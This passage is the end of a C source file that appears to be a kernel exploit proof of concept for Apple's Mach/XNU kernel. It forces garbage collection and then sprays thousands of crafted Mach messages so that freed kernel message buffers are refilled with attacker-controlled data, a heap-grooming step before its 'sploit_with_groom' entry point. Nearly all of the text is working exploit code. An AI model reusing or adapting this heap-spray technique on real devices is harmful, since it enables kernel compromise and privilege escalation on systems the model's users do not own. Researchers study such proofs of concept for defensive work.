  //gets(&hello);// err
  force_gc();
  force_gc();
  sleep(2);

  printf("trying to reallocate\n");
  // reallocate kmsgs:
  mach_msg_header_t* msg = build_replacer_msg(replacer_target);
  uint32_t sent_replacers = 0;
  for (int i = 0; i < N_KMSG_HOLDERS; i++) {
    msg->msgh_remote_port = kmsg_holders[i];
    for (int j = 0; j < 1024; j++) {
      err = mach_msg_send(msg);
      if (err != KERN_SUCCESS) {
        printf("reallocate msg send failed (%d, %d) 0x%x %s\n", i, j, err, mach_error_string(err));
        exit(EXIT_FAILURE);
      }
      sent_replacers++;
    }
  }

  printf("did reallocate with %d sent replacers?\n", sent_replacers);
  gets(NULL);

}

int main(int argc, char** argv) {

  sploit_with_groom();

  return 0;
}
